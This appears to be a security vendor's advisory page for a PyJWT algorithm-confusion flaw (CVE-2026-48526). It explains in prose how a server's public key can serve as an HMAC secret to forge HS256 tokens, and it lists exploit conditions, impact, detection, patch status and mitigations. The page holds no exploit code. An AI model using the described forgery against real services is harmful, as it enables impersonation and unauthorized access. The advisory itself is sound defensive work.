HarborGuard / CVE
Back to search
HIGHCVE-2026-48526Published Modified CNA GitHub_M

CVE-2026-48526: PyJWT: Public-key JWK accepted as HMAC secret enables forged HS256 tokens when mixed families are allowed

PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.

HarborGuard Analysis

HarborGuard analysis

Synopsis

This is an algorithm-confusion vulnerability in PyJWT, a widely used Python JSON Web Token library. A remote attacker with no authentication can exploit the flaw by taking a server's public key and using it as the HMAC secret to forge HS256-signed tokens, bypassing signature verification when the server accepts both asymmetric (RS256, ES256) and HMAC (HS256) algorithm families. Successful exploitation lets an attacker forge arbitrary JWT claims, enabling identity impersonation, authorization bypass, and access to protected data or actions. Note: the description references a fix in 2.13.0, but no fix version has been formally published to the advisory record yet; HarborGuard is tracking the advisory for confirmed patch availability.

HarborGuard Coverage

Detection

Detection is available across every HarborGuard environment. As soon as the CVE record is ingested from upstream feeds (typically within minutes of publication), it is matched against all customer images containing the pyjwt package, including custom-built images that bundle the library directly.

Available
Triage

HarborGuard scores this finding at CVSS 7.4 HIGH using the recorded vector, and per-environment compliance policy weighting can escalate or suppress routing priority based on each organization's risk tolerance. Triage results are routed to the appropriate team inbox within each customer organization based on image ownership and policy configuration.

Available
Patch

Because no fix version has been formally confirmed in the advisory record, HarborGuard re-evaluates the advisory on every ingest cycle and will make a patched-image rebuild available the moment an upstream fix is published. For customers with auto-remediation enabled, the rebuild, regression run, and PR against affected workloads will be triggered automatically at that point.

Pending upstream

Exploit Conditions

  • Network reachabilityRequired

    The attacker must reach the JWT-accepting service over the network; the AV:N vector means no local or physical access is required.

  • AuthenticationNot required

    No credentials are needed; the attacker only requires knowledge of the target server's public key, which is often publicly available.

  • Victim interactionNot required

    No user action is needed; the attacker submits a crafted token directly to the service endpoint.

  • Attack complexityDetail

    AC:H indicates the exploit is not trivially condition-free: the attacker must obtain the server's public key and the server must be configured to accept both asymmetric and HMAC algorithm families simultaneously.

Blast Radius

  • Forged JWT claims allow the attacker to impersonate any user identity, including privileged accounts, without knowing any private key or password.
  • Authorization checks that rely on JWT-encoded roles or scopes are bypassed, granting access to protected API endpoints and data.
  • Confidential resources tied to authenticated sessions (user records, stored tokens, application data) become readable by the attacker.
  • Application data or state reachable through authenticated write operations can be modified using the forged token.

How HarborGuard Handles This

Available on HarborGuard: the CVE is matched against customer images as soon as it enters the ingest pipeline, covering both base images and custom builds that include pyjwt. Because no upstream fix version has been formally confirmed in the advisory record at this time, HarborGuard will continue re-checking the advisory on every ingest cycle. The moment a confirmed fix (expected at 2.13.0 based on the upstream description) is reflected in the advisory data, a patched-image rebuild at that version becomes available; for customers with auto-remediation enabled, this triggers a rebuild, a regression test run, and a PR opened against affected workloads. While no patch is confirmed, recommended compensating controls include restricting JWT algorithm selection in application configuration to a single family (asymmetric only), applying network-policy rules to limit which services can present tokens to the verifier, and using a Web Application Firewall rule or middleware to reject tokens whose header specifies an HMAC algorithm when the deployment is intended to use only asymmetric keys.

See how HarborGuard automates this

Metrics

CVSS v3.1
7.4
Severity
HIGH
Fixed in
Affected Products
1
Affected packages
  • jpadilla / pyjwt
    < 2.13.0
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
References